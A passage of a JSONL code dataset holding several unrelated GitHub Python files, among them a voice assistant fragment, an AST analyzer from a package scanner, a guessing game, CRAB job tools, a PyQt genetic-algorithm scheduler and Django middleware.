in query :\n query = query.replace(\"search\",\"\")\n query = query.replace(\"on youtube\",\"\")\n query = query.replace(\"youtube\",\"\")\n string = query.split()\n search = \"\"\n for i in string:\n search += i\n search += \"+\"\n webbrowser.open(f\"https://www.youtube.com/results?search_query={search}\")\n elif 'goodbye jack' in query:\n speak('thanks for using me have a good day')\n exit(0)\n else:\n print(\"sorry,i unable to answer this task\")\n","repo_name":"prashikGavali/Virtual_Assistant","sub_path":"friday.py","file_name":"friday.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"46842428731","text":"import os\nimport typing\nfrom pathlib import Path\n\n\nfrom .. import rules\nfrom .rewrite_ast import ASTRewrite\nfrom .taint.visitor import TaintAnalysis\nfrom .visitor import Visitor\nfrom .nodes import Context\nfrom ...utils import lookup_lines\n\n\nclass ReadOnlyAnalyzer(Visitor):\n hooks = []\n\n def load_tree(self, source: Path):\n if self.tree is None:\n cached = TaintAnalysis.from_cache(source=source, metadata=self.metadata)\n if not cached.traversed:\n cached.traverse()\n\n self.tree = cached.tree\n\n def __call__(self, pth: Path) -> typing.Iterator[rules.Rule]:\n if not self.hooks:\n return\n elif self.kwargs.get('mime') != 'text/x-python' and not os.fspath(self.path).endswith('.py'):\n return\n try:\n self.load_tree(source=pth)\n self.traverse()\n\n for x in self.hooks:\n x.post_analysis(self)\n\n lines = [x.line_no for x in self.hits if x.line_no is not None]\n lines_lookup = lookup_lines(pth, lines)\n for x in self.hits:\n if x.location is None:\n x.location = os.fspath(pth)\n\n if x.line_no in lines_lookup and not x.line:\n x.line = lines_lookup[x.line_no]\n\n yield x\n\n finally:\n for x in self.hooks:\n x.reset_hook()\n\n def _visit_node(self, context:Context):\n node_type = 'node_' + type(context.node).__name__\n\n for hook in self.hooks:\n handler = getattr(hook, node_type, None)\n if handler is not None:\n self.hits.extend(handler(context=context))\n elif hasattr(hook, '_visit_node'):\n self.hits.extend(hook._visit_node(context=context))\n","repo_name":"RootLUG/aura","sub_path":"aura/analyzers/python/readonly.py","file_name":"readonly.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"8818565876","text":"import playsound\nimport random\n\"\"\"Use of Binary Search\"\"\"\nno=random.randint(1,99)\nguesses=10\nprint('\\n')\nprint(\"\\t\\t-------------------------------------------------\")\nprint('\\t\\t|\\tWelcome to Guessing the Number Game\\t|')\nprint('\\t\\t|\\t\\t\\t\\t\\t\\t|')\nprint('\\t\\t|\\t Total {} chances\\t\\t|'.format(guesses))\nprint(\"\\t\\t-------------------------------------------------\")\nprint(\"\\nLet's start by now....start guessing the number :-\\n\")\nprint(\"Hint: Number is less then 100 :-\\n\")\n\ndef howmuch(number,guess):\n if number > guess:\n difference = number - guess\n else:\n difference = guess - number\n return difference\n\ndef winning_music():\n \"\"\"play winning music\"\"\"\n win_music =[\"Sound_tracks/anime_wow.mp3\",\"Sound_tracks/smb_world_clear.mp3\"]\n try:\n playsound.playsound(random.choice(win_music),True)\n except Exception as e:\n print(e) \n\ndef losing_music():\n \"\"\"play losing music\"\"\"\n lose_music = [\"Sound_tracks/Nope.mp3\",\"Sound_tracks/smb_gameover.mp3\"]\n try:\n playsound.playsound(random.choice(lose_music),True)\n except Exception as e:\n print(e) \n\nif __name__ == '__main__':\n \"\"\"initial no of guesses are zero\"\"\"\n chances = 0\n while chances < guesses:\n try:\n guess_num = int(input(\"Guess The Number: \"))\n \"\"\"incrementing number of chances after taking input\"\"\"\n chances += 1 \n except :\n print('\\nPlease enter a number....\\n')\n continue\n \n if guess_num < no:\n if howmuch(no,guess_num) <= 5:\n print(f\"\\nStill smaller, But you are closer to the actual number..keep guessing Good luck! chances left:{guesses-chances}\\n\")\n \n elif howmuch(no,guess_num) >5 and howmuch(no,guess_num) <=10:\n print(f\"\\nBit Smaller, But you are on a right path....keep guessing. chances left:{guesses-chances}\\n\")\n\n else:\n print(f'\\nNooo....Guessed Number is less than actual number! Try to get closer.... chances left:{guesses-chances}\\n')\n\n elif guess_num > no:\n if howmuch(no,guess_num) <=5:\n print(f\"\\nStill Higher, But you are closer to the actual number..keep guessing Good luck! chances left:{guesses-chances}\\n\")\n \n elif howmuch(no,guess_num) > 5 and howmuch(no,guess_num) <=10:\n print(f\"\\nBit Higher, But you are on a right path....keep guessing. chances left:{guesses-chances}\\n\")\n\n else:\n print(f'\\nNooo....Guessed Number is greater than actual number! Try to get closer.... chances left:{guesses-chances}\\n')\n\n else:\n print(f\"\\nWoooohoooh....WINNER.... congratulations You took {chances} chances.\\n\")\n winning_music()\n exit(1)\n\n if chances == guesses:\n print(\"Out of chances!\\n\")\n print(\"You are not smarter than me see yaa.....\\n\")\n print('----------------Game Over---------------\\n')\n losing_music()\n exit(1)\n\n \n\n\n\n\n\n","repo_name":"aaaravv/guess-the-number","sub_path":"Guess_the_Number/guesstheno.py","file_name":"guesstheno.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71872851938","text":"# Definition of tools for CRAB job submission.\n# This file is part of https://github.com/hh-italian-group/h-tautau.\nfrom __future__ import print_function\nimport re\nimport sys\nfrom CRABClient.UserUtilities import ClientException\nfrom CRABAPI.RawCommand import crabCommand\nhttplib=__import__('httplib' if sys.version_info.major<3 else 'http.client')\nHTTPException=httplib.HTTPException if sys.version_info.major<3 else httplib.client.HTTPException\n\ndef submit(config, dryrunBool):\n try:\n crabCommand('submit', config = config, dryrun = dryrunBool)\n except HTTPException as hte:\n print(str(hte))\n print(\"\\n{}\\nERROR: failed to submit task due to HTTPException.\\n{}\".format(hte, hte.headers))\n except ClientException as cle:\n print(\"ERROR: failed to submit task due to ClientException.\\n{}\".format(cle))\n\nclass Job:\n def __init__(self, line, jobNameSuffix = ''):\n items = list(filter(lambda s: len(s) != 0, re.split(\" |\\t\", line)))\n n_items = len(items)\n if n_items < 2 or n_items > 3:\n raise RuntimeError(\"invalid job description = '{}'.\".format(line))\n self.jobName = items[0]\n self.requestName = self.jobName + jobNameSuffix\n self.inputDataset = items[1]\n if n_items > 2:\n self.lumiMask = items[2]\n else:\n self.lumiMask = None\n\n\n def __str__(self):\n str = \"requestName = '{}', inputDataset = '{}'\".format(self.requestName, self.inputDataset)\n if self.lumiMask is not None:\n str += \", lumiMask = '{}'\".format(self.lumiMask)\n return str\n\n def submit(self, config, dryrunBool):\n config.General.requestName = self.requestName\n config.Data.inputDataset = self.inputDataset\n if self.lumiMask is not None:\n config.Data.lumiMask = self.lumiMask\n submit(config, dryrunBool)\n\nclass JobCollection:\n def __init__(self, file_name, job_names = '', lumi_mask = '', jobNameSuffix = ''):\n self.jobs = []\n self.jobNames = job_names\n input_file = open(file_name, 'r')\n lines = [ s.strip() for s in input_file.readlines() ]\n lines = list(filter(lambda s: len(s) != 0 and s[0] != '#', lines))\n if len(lines) <= 1:\n raise RuntimeError(\"file '{}' is empty\".format(file_name))\n header_items = list(filter(lambda s: len(s) != 0, re.split(\" |\\n\", lines[0])))\n index_line = 0\n if header_items[0].startswith(\"lumiMask\"):\n index_line = 1\n lumi = list(filter(lambda s: len(s) != 0, re.split(\"=\", header_items[0])))\n self.lumiMask = lumi[1]\n else:\n self.lumiMask = ''\n self.pyCfgParams = list(filter(lambda s: len(s) != 0, re.split(\" |\\t\", lines[index_line])))\n\n if len(header_items) > 0:\n if header_items[0].lower() == \"signal\":\n if len(lines) < 4:\n raise RuntimeError(\"invalid signal jobs definition in file '{}'\".format(file_name))\n masses = list(filter(lambda s: len(s) != 0, re.split(\" |\\t\", lines[2])))\n template = lines[3]\n for mass in masses:\n line = template.format(M = mass)\n self.jobs.append(Job(line))\n return\n if len(lumi_mask) != 0:\n self.lumiMask = lumi_mask\n\n index_sample = 1\n if header_items[0].startswith(\"lumiMask\"):\n index_sample = 2\n for line in lines[index_sample:]:\n self.jobs.append(Job(line, jobNameSuffix))\n input_file.close()\n\n def __str__(self):\n result = \"cfgParams = {}, lumiMask = '{}'\".format(self.pyCfgParams, self.lumiMask)\n for job in self.jobs:\n if len(self.jobNames) == 0 or job.jobName in self.jobNames:\n result += \"\\n\" + str(job)\n return result\n\n def submit(self, config, splitting, unitsPerJob, totalUnits, dryrunBool):\n config.JobType.pyCfgParams = self.pyCfgParams\n config.Data.unitsPerJob = unitsPerJob\n config.Data.splitting = splitting\n if (totalUnits > 0):\n config.Data.totalUnits = totalUnits\n\n for job in self.jobs:\n if len(self.jobNames) == 0 or job.jobName in self.jobNames:\n config.Data.lumiMask = self.lumiMask\n job.submit(config, dryrunBool)\n","repo_name":"cms-tau-pog/TauMLTools","sub_path":"Production/python/crab_tools.py","file_name":"crab_tools.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"13855383790","text":"import RPi.GPIO as GPIO\nimport pygame\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(4, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n\ndef run():\n\tinput = GPIO.input(4)\n\tif input == True:\n\t\tprint(\"Input is true\")\n\telse:\n\t\tprint(\"Input is false\")\n\nif __name__ == '__main__':\n\tquit = False\n\twhile quit == False:\n\t\trun()\n\t\tevents = pygame.event.get()\n\t\tfor event in events:\n\t\t\tif event.key == pygame.K_q:\n\t\t\t\tquit=True\n\t\t\tif event.type == QUIT:\n\t\t\t\tquit = True\n\n\tpygame.quit()\n\tsys.exit()\n","repo_name":"filtoid/PythonButtonRPi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8933770506","text":"\n\nimport random\n\nimport sys\nfrom typing import Counter\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nimport plotly.express as px\nimport pandas as pd\nimport numpy\nimport matplotlib.pyplot as plt\n\nclass ViewTask(QMainWindow):\n MATERIA = ' '\n PROBABILIDADDESENDENCIA = 0.0\n PROBABILIDADMUTACION = 0.0\n PROBABILIDADMUTACIONGEN = 0.0\n NOMBRE_TAREA = ' '\n TIEMPO_TAREA = 0\n LISTATAREAS = []\n IMPORTANCIATAREA = \"\"\n CANTIDADTAREA = 0\n HORASDIA = 0\n TAREASDIA = 0\n LISTAJOINPADREHIJO = []\n GENERACIONES = []\n DIASENTREGA = 0\n DIASTRABAJDOS = 0\n POBLACIONMAXIMA = 0\n COUNT = 0\n GENERACIONES = 10\n\n def __init__(self) -> None:\n super().__init__()\n uic.loadUi(\"ui.ui\",self)\n self.ventanaDos.hide()\n self.btn_siguiente.clicked.connect(self.agregarDias)\n self.btn_agregar.clicked.connect(self.agregarTareas)\n self.btn_siguiente.setEnabled(False)\n self.btn_siguiente.clicked.connect(self.iniciarIteraccion)\n self.PROBABILIDADDESENDENCIA = 0.86\n self.PROBABILIDADMUTACION = 0.1\n self.PROBABILIDADMUTACIONGEN = 0.15\n self.POBLACIONMAXIMA = 8\n \n def agregarDias(self):\n print(\"tareas agregadasa\")\n if not self.calcularMaximoDia():\n self.ventanaDos.show()\n\n def validarDatos(self):\n try:\n self.MATERIA = str(self.materia.text())\n self.NOMBRE_TAREA = str(self.nombre_tarea.text())\n self.TIEMPO_TAREA = int(self.tiempo_tarea.text())\n self.HORASDIA = int(self.horas_porDia.text())\n self.TAREASDIA = int(self.tareas_porDia.text())\n self.DIASENTREGA = int(self.dias_de_entrega.text())\n self.DIASTRABAJDOS = int(self.dias_trabajados.text())\n except ValueError:\n print(\"Datos mal ingresados\")\n\n def agregarTareas(self):\n with open(\"prueba.txt\") as archivo:\n for x in archivo.readlines():\n print(x)\n linea = x.split(\" \")\n self.LISTATAREAS.append((\n linea[0],\n linea[1],\n linea[2],\n linea[3].rstrip(\"\\n\")\n ))\n\n # self.validarDatos()\n\n # self.LISTATAREAS.append((\n # self.MATERIA,\n # self.NOMBRE_TAREA,\n # self.TIEMPO_TAREA,\n # self.IMPORTANCIATAREA,\n # self.DIASENTREGA\n # ))\n \n # self.lista_total.addItem(\"Materia: \"+self.MATERIA+\"\\n Nombre-Tarea: \"+str(self.NOMBRE_TAREA)+\"\\n Tiempo: \"+str(self.TIEMPO_TAREA)+\"\\n Importancia-Tarea: \"+str(self.IMPORTANCIATAREA))\n # self.lista_total.addItem(\"----------------------------------------------------\")\n # self.materia.setText(\"\")\n # self.nombre_tarea.setText(\"\")\n # self.tiempo_tarea.setText(\"\")\n print(\"lista\")\n print(self.LISTATAREAS)\n self.btn_siguiente.setEnabled(True)\n def calcularMaximoDia(self):\n status = False\n li = [int(x[3]) for x in self.LISTATAREAS]\n valorMaximo = max(li)\n print(valorMaximo)\n if valorMaximo > int(self.dias_total_trabajo.text()):\n status = True\n else:\n status=False\n\n return status \n\n def iniciarIteraccion(self):\n if not self.calcularMaximoDia():\n listaUltimaGeneracion = []\n listaIndividuosGeneracion = []\n listaIndividuos = self.generarIndividuos()\n for x in range(self.GENERACIONES):\n listaSeleccionIndividuos = self.seleccionIndividuos(listaIndividuos)\n listaCruzaIndividuos = self.cruzaIndividuos(listaSeleccionIndividuos)\n listaMutacionIndividuos = self.mutaTareas(listaCruzaIndividuos)\n listaTareasCal = self.calcularLasMejoresTareas(listaMutacionIndividuos)\n listaIndividuosGeneracion.append(self.calcularMayorPeorPromedio(listaTareasCal))\n listaIndividuos = self.poda(listaTareasCal)\n listaUltimaGeneracion = listaIndividuos\n listaIndividuos = [x[2] for x in listaIndividuos]\n #self.poda()\n self.msjMejorIndividuo.addItem(str(listaUltimaGeneracion[0]))\n self.graficar(listaIndividuosGeneracion)\n self.graficarGantt2(listaUltimaGeneracion)\n else:\n print(\"error de dia\")\n \n def graficarGantt2(self,lista):\n fig, ax = plt.subplots(1,figsize=(16,6))\n print(lista[0][4])\n tareasValidas = lista[0][4]\n print(tareasValidas)\n cont = 0\n cont2 = 0\n listaaux = []\n for i in tareasValidas:\n diasValidos = (int(i[2])/8)\n listaaux.append(cont2)\n cont2 += diasValidos\n\n for y,i in enumerate(tareasValidas):\n print(i)\n diasValidos = (int(i[2])/8)\n ax.barh(i[1]+' '+i[3]+\" \"+str(listaaux[y]),diasValidos,left=cont) \n cont += diasValidos\n ax.set_title(\"Tareas del Individuo\")\n\n for y,i in enumerate(ax.patches):\n print(i)\n plt.text(i.get_x()+0.5, i.get_y()+0.5,\n str(round((listaaux[y]), 2)),\n fontsize=10, fontweight='bold',\n color='black')\n plt.show()\n pass\n\n\n # def graficaGantt(self,lista):\n # fig, ax = plt.subplots(1,figsize=(16,6))\n # i = 0\n # numDiaTareas = []\n # print(lista[0][2])\n # tareasValidas = lista[0][2]\n # tareasValidas = [x[3] for x in tareasValidas]\n # nombreTareas = []\n # for j in range(len(tareasValidas)):\n # tareita = tareasValidas[j]\n # tareita = int(tareita)\n # diasTareasValidas = tareasValidas[j] / 8\n # numDiaTareas.append(tareita)\n # nombreValido = lista[0][4][j][1]\n # nombreTareas.append(nombreValido)\n # print(numDiaTareas[j])\n # ax.barh(nombreTareas[j],i-1,left=numDiaTareas[j]) \n # plt.show()\n \n def individuo_unico(self,aux1,aux2):\n unico = True \n for i in aux2:\n if aux1 == i:\n unico = False\n break\n return unico\n\n def generarIndividuos(self):\n print(\"-----Generar Individuo-----\")\n cont = 0\n poblacion = []\n array_individuo = []\n for i in range(int(self.cantidad_tarea_por_materia.text())):\n while cont < len(self.LISTATAREAS):\n num_aleatorio = random.randint(0,len(self.LISTATAREAS)-1)\n if self.individuo_unico(num_aleatorio,array_individuo):\n array_individuo.append(num_aleatorio)\n cont += 1\n cont = 0\n poblacion.append(array_individuo)\n array_individuo = []\n print(poblacion)\n return poblacion\n \n\n def seleccionIndividuos(self,listaIndividuos):\n print(\"--seleccion de paquetes---\")\n listaIndividuosSelecion = []\n self.LISTAJOINPADREHIJO = listaIndividuos\n count = 1\n count2 = 0\n while count < len(listaIndividuos):\n listaIndividuosSelecion.append((listaIndividuos[count2],listaIndividuos[count],random.randint(1,100)/100,random.randint(0,len(self.LISTATAREAS)-1)))\n if count == len(listaIndividuos)-1:\n count2+=1\n count = count2\n count+=1\n print(listaIndividuosSelecion)\n return listaIndividuosSelecion\n\n def cruzaIndividuos(self,listaSeleccionTareas):\n print(\"-------cruza------\")\n listaCruzaIndividuos = []\n listaProbabilidadDesendencia = []\n for x in listaSeleccionTareas:\n if random.randint(1,100)/100 <= self.PROBABILIDADDESENDENCIA:\n listaProbabilidadDesendencia.append(x)\n pass\n for x in listaProbabilidadDesendencia:\n individuosPaquete1 = x[0]\n individuosPaquete2 = x[1]\n corte = x[3]\n listaCruzaIndividuos.append([individuosPaquete1[:corte]+individuosPaquete2[corte:]])\n listaCruzaIndividuos.append([individuosPaquete2[:corte]+individuosPaquete1[corte:]])\n self.eliminarTareasRepetidos(listaCruzaIndividuos)\n \n print(listaCruzaIndividuos)\n return listaCruzaIndividuos\n\n def eliminarTareasRepetidos(self,listaCruzaIndividuos):\n for x in listaCruzaIndividuos:\n individuo1 = x[0]\n listanew2 = [x for x,y in Counter(individuo1).items() if y > 1]\n for p in listanew2:\n individuo1.remove(p)\n self.agregandoLosNuevosValoresIndividuos(individuo1)\n\n def agregandoLosNuevosValoresIndividuos(self,listaIndividuo):\n for x in range(0,len(self.LISTATAREAS)):\n if not x in listaIndividuo:\n listaIndividuo.append(x)\n\n def mutaTareas(self,listaCruzaIndividuos):\n print(\"-------Mutacion-------\")\n listaMutaIndividuo = []\n for x in listaCruzaIndividuos:\n listaMutaIndividuo.append(x[0])\n \n for x in listaMutaIndividuo:\n if random.randint(1,100)/100 <= self.PROBABILIDADMUTACION:\n for y in x:\n if random.randint(1,100)/100 <= self.PROBABILIDADMUTACIONGEN:\n x.remove(y)\n rp = random.randint(0,len(x))\n x.insert(rp,y)\n # if random.randint(1,100)/100 <= self.PROBABILIDADMUTACION:\n # self.mutar(x[0])\n # print(listaCruzaIndividuos)\n for x in listaMutaIndividuo:\n self.LISTAJOINPADREHIJO.append(x)\n \n print(self.LISTAJOINPADREHIJO)\n return self.LISTAJOINPADREHIJO\n \n def mutar(self,listaCruzaIndividuos):\n for x in listaCruzaIndividuos:\n if random.randint(1,100)/100 <= self.PROBABILIDADMUTACIONGEN:\n listaCruzaIndividuos.remove(x)\n randoPosicionNumber = random.randint(0,len(listaCruzaIndividuos))\n listaCruzaIndividuos.insert(randoPosicionNumber,x)\n \n pass\n\n def calcularLasMejoresTareas(self,listaMutacionIndividuo):\n print(\"-----calcular mejores tareas----\")\n listaTareas = []\n for i,x in enumerate(listaMutacionIndividuo):\n listaTareas.append(self.calcularTareaPorIndividuo(x,i))\n # pass\n listaTareas.sort(key = lambda tareas: tareas[1],reverse=True)\n \n return listaTareas\n\n def calcularTareaPorIndividuo(self,lista,num):\n listaTareasChidas = []\n totalHrs = 0\n listaHrs = []\n listaTareas = []\n \n for x in lista:\n totalHrs += int(self.LISTATAREAS[x][2])\n listaHrs.append(totalHrs)\n listaTareas.append(self.LISTATAREAS[x])\n for i,x in enumerate(listaHrs):\n hrsTarea = int(listaTareas[i][3])*8\n if x <= hrsTarea:\n listaTareasChidas.append(listaTareas[i])\n\n return (\"Individuo\"+str(num),len(listaTareasChidas),lista,\"Tareas Validas: \",listaTareasChidas)\n \n def calcularMayorPeorPromedio(self,listaIndividuos):\n \n mejorPeorPromedio = []\n mejorPeorPromedio.append(max([x[1] for x in listaIndividuos]))\n mejorPeorPromedio.append(min([x[1] for x in listaIndividuos])) \n mejorPeorPromedio.append(numpy.mean([x[1] for x in listaIndividuos]))\n\n return mejorPeorPromedio\n \n def poda(self,listaMutaIndividuos):\n print(\"-----poda-----\")\n if len(listaMutaIndividuos) > self.POBLACIONMAXIMA:\n listaMutaIndividuos = listaMutaIndividuos[:self.POBLACIONMAXIMA]\n # diferencia = len(listaMutaIndividuos) - self.POBLACIONMAXIMA\n # for x in range(diferencia):\n # listaMutaIndividuos.pop(random.randint(0,len(listaMutaIndividuos)-1))\n listaMutaIndividuos.sort(key = lambda tareas: tareas[1],reverse=True)\n \n self.lista_tarea_2.addItem(f\"----Generacion {self.COUNT+1}----\")\n print(listaMutaIndividuos)\n for x in listaMutaIndividuos:\n self.lista_tarea_2.addItem(str(x))\n # lista = [x[2] for x in listaMutaIndividuos]\n \n self.COUNT+=1\n return listaMutaIndividuos\n \n\n def graficar(self,listaIndividuosGeneracion):\n fig = plt.figure(figsize=(12,7))\n fig.tight_layout()\n plt.subplot(1, 1, 1)\n\n yM = [x[0] for x in listaIndividuosGeneracion]\n yP = [x[1] for x in listaIndividuosGeneracion]\n yPro = [x[2] for x in listaIndividuosGeneracion]\n\n plt.plot([x for x in range(self.GENERACIONES)],yM,label=\"Mejor\")\n plt.plot([x for x in range(self.GENERACIONES)],yP,label=\"Peor\")\n plt.plot([x for x in range(self.GENERACIONES)],yPro,label=\"Promedio\")\n plt.scatter(len(yM)-1,listaIndividuosGeneracion[-1][0],label=f\"Mejor Individuo\",color=\"red\")\n plt.title(\"Comportamiento\") \n plt.legend()\n plt.show()\n pass\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n GUI = ViewTask()\n GUI.show()\n sys.exit(app.exec_())\n\n\n\n\n# Compiladores Analizador-Sementico 6 4 \n# Mantenimiento pipeline-aws 12 5 \n# Multimedia unity-2d 11 6\n# Ingles Report-speech 9 1","repo_name":"ozel-byte/todo-app-proyecto-c3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13349,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6622866830","text":"import pandas as pd\nimport os\nfrom pandas import DataFrame\nimport sys\nimport seaborn as sns\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# LMS 계측 정보 추출하는 함수\n'''\ndef m_info(rawdata):\n a = rawdata.index[rawdata[0].isna()] # NA행 찾기 (1행, 112행)\n li = rawdata.index[rawdata[0] == 'Linear'] # 계측 데이터 찾기\n mea_info = rawdata[a[0] + 1:a[1]]\n mea_spectrum = rawdata.iloc[li[0]+1:]\n mea_data = pd.concat(mea_info, mea_spectrum)\n #m2 = mea_info.drop(mea_info.columns[2:], axis='columns') # measurement information\n split_words = mea_info[0].str.split(\"\\\\\").str[-1] # 완전 힘들게 찾았음 ㅎㅎㅎ\n mea_info[0] = split_words\n mea_info_modi = mea_info.drop_duplicates([0]).sort_values(by=[0], axis=0) # 0번 열 오름차순 정리\n select_info = ['Actual sensitivity', 'Average type', 'Channelgroup', 'DOF id', 'Frequency resolution',\n 'Function class', 'HW Range', 'Measured quantity', 'Number of averages', 'Number of lines',\n 'Original project', 'Original section', 'Overlap', 'Spectrum scaling', 'Window type',\n 'Y axis unit', 'Original run'] # 필요 계측정보 - 수정가능\n mea_info_last = mea_info_modi[mea_info_modi[0].isin(select_info)].reset_index(drop=True) # 최종 계측 정보\n return mea_info_last\n\n#def m_data(rawdata):\n'''\n\nrawdata = pd.read_csv('u24a.csv', header=None, encoding='cp949')\n\nnaraw = rawdata.index[rawdata[0].isna()] # NA행 찾기 (1행, 112행)\nli = rawdata.index[rawdata[0] == 'Linear'] # 계측 데이터 찾기\nmea_info = rawdata[naraw[0] + 1:naraw[1]].T.drop_duplicates().T\nsplit_words = mea_info[0].str.split(\"\\\\\").str[-1] # 완전 힘들게 찾았음 ㅎㅎㅎ\nmea_info[0] = split_words\nmea_info_modi = mea_info.drop_duplicates([0]).sort_values(by=[0], axis=0) # 0번 열 오름차순 정리\nselect_info = ['Actual sensitivity', 'Average type', 'Channelgroup', 'DOF id', 'Frequency resolution',\n 'Function class', 'HW Range', 'Measured quantity', 'Number of averages', 'Number of lines',\n 'Original project', 'Original section', 'Overlap', 'Spectrum scaling', 'Window type',\n 'Y axis unit', 'Original run'] # 필요 계측정보 - 수정가능\n\nmea_info_last = mea_info_modi[mea_info_modi[0].isin(select_info)] # 최종 계측 정보\n\nmea_spectrum = rawdata.iloc[li[0] + 1:].T.drop_duplicates().T\nmea_data = pd.concat([mea_info_last, mea_spectrum], ignore_index=True).reset_index(drop=True)\nmea_data.to_csv('u24a_saved.csv',header=False, index=False, encoding='cp949')\nb = mea_data.index[mea_data[0] == 'Original run'] # original run 행 인덱스 추출\nmea_spectrum.columns = mea_data.iloc[b[0],:]\nmea_spectrum = mea_spectrum.set_index('Original run')\nmea_spectrum = mea_spectrum.astype(float)\nfig = plt.figure(figsize=(10,6))\nax = fig.add_subplot(1,1,1)\n\nax.plot(mea_spectrum.index.astype(float), mea_spectrum)\nplt.show()","repo_name":"seongheechoi/10_ETC","sub_path":"01_GUI/vib_import.py","file_name":"vib_import.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16796777702","text":"\"\"\"Middleware for working with integrations.\"\"\"\n\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.utils.deprecation import MiddlewareMixin\n\nfrom djblets.integrations.manager import get_integration_managers\n\nif TYPE_CHECKING:\n from django.http import HttpRequest\n\n\nclass IntegrationsMiddleware(MiddlewareMixin):\n \"\"\"Middleware to manage integration lifecycles and data.\n\n Any project making use of\n :py:class:`~djblets.integrations.manager.IntegationManager` must include\n this middleware. This will handle multi-process synchronization and cache\n invalidation, which is needed to ensure that settings aren't stale on\n other processes when a configuration is added, edited, or removed.\n \"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n if 'djblets.integrations' not in settings.INSTALLED_APPS:\n raise ImproperlyConfigured(\n 'IntegrationsMiddleware requires djblets.integrations to be '\n 'listed in settings.INSTALLED_APPS.'\n )\n\n super().__init__(*args, **kwargs)\n\n self.check_expiration = not getattr(settings, 'RUNNING_TEST', False)\n\n def process_request(\n self,\n request: HttpRequest,\n ) -> None:\n \"\"\"Process an HTTP request.\n\n This will run through all the integration managers, checking if any\n have expired and ensuring they have the latest state.\n \"\"\"\n if self.check_expiration:\n for integration_manager in get_integration_managers():\n integration_manager.check_expired()\n","repo_name":"djblets/djblets","sub_path":"djblets/integrations/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"34"} +{"seq_id":"56929218","text":"# coding:gbk\n\nimport requests\nimport time\nimport pygame\nfrom bs4 import BeautifulSoup\nfrom builtins import input\n\n\nurl = \"https://space.bilibili.com/\"\n\nmuc = \"dididi.mp3\"\npygame.mixer.init()\nmusicTrack = pygame.mixer.music.load(muc)\n\npage = requests.get(url)\n\nif len(url) == 27:\n UID = input(\"输入监控的UID: \")\n url += UID\n print(\"开始监控...\")\n\npage = requests.get(url)\n\nwhile(page.status_code == 404):\n url = \"https://space.bilibili.com/\"\n UID = input(\"用户不存在重新输入UID: \")\n url += UID\n page = requests.get(url)\n \nsoup = BeautifulSoup(page.content,'html.parser')\noriName = soup.find('title').string[:-35]\n \nwhile True:\n page = requests.get(url)\n\n if (page.status_code == 200):\n \n soup = BeautifulSoup(page.content,'html.parser')\n usrName = soup.find('title').string[:-35]\n print(usrName)\n if(usrName != oriName):\n pygame.mixer.music.play(-1)\n print(\"名字修改了!原来的名字:\"+ oriName)\n time.sleep(10)\n \n elif (page.status_code == 404):\n print(\"!404PAGE!\")\n time.sleep(10)\n \n else:\n print(\"!Wrong!\")\n time.sleep(10)\n ","repo_name":"qdhfsh/bilibiliNicknameMonitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"72328279778","text":"# I really, really wanted to do from enum import Enum\n# Alas, transcrypt won't import from the standard library\n\n\nclass AwfulEnum: # I'm so sorry\n def __init__(self):\n self._dict = {getattr(self, func): func for func in dir(self) if not func.startswith(\"__\")}\n\n def __getitem__(self, item):\n return self._dict[item]\n\n\nclass _MessageTypes(AwfulEnum):\n TEXT = 1\n IMAGE = 2\n AUDIBLES = 3\n\n\nMessageTypes = _MessageTypes()\n","repo_name":"python-discord/summer-code-jam-2020","sub_path":"whimsical-woodpeckers/www/src/py/common/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"34"} +{"seq_id":"15545943838","text":"from PyQt5 import QtWidgets\n\nfrom db.Repository import Repository\nfrom ui.DeleteSampleWin import Ui_MainWindow as dsw\n\n\nclass DeleteSampleModal(QtWidgets.QMainWindow):\n def __init__(self, callbackRegenrate: callable):\n super(DeleteSampleModal, self).__init__()\n self.callbackRegenrate = callbackRegenrate\n self.dsw = dsw()\n self.dsw.setupUi(self)\n\n self.repo = Repository()\n\n samples = self.repo.getAllSample()\n\n for sample in samples:\n self.dsw.comboBox.addItem(sample.name, sample.uid)\n\n self.dsw.pushButton.clicked.connect(self.deleteSample)\n\n def deleteSample(self):\n uidSample = self.dsw.comboBox.currentData()\n self.repo.delSample(uidSample)\n self.callbackRegenrate()\n self.hide()","repo_name":"OmgProsto/pqt","sub_path":"src/DeleteSampleModal.py","file_name":"DeleteSampleModal.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10606407134","text":"'''\nName : Deeksha S\nEmail : dsurasan@student.fitchburgstate.edu\nWeek : 5\nDesc : Program to take a string 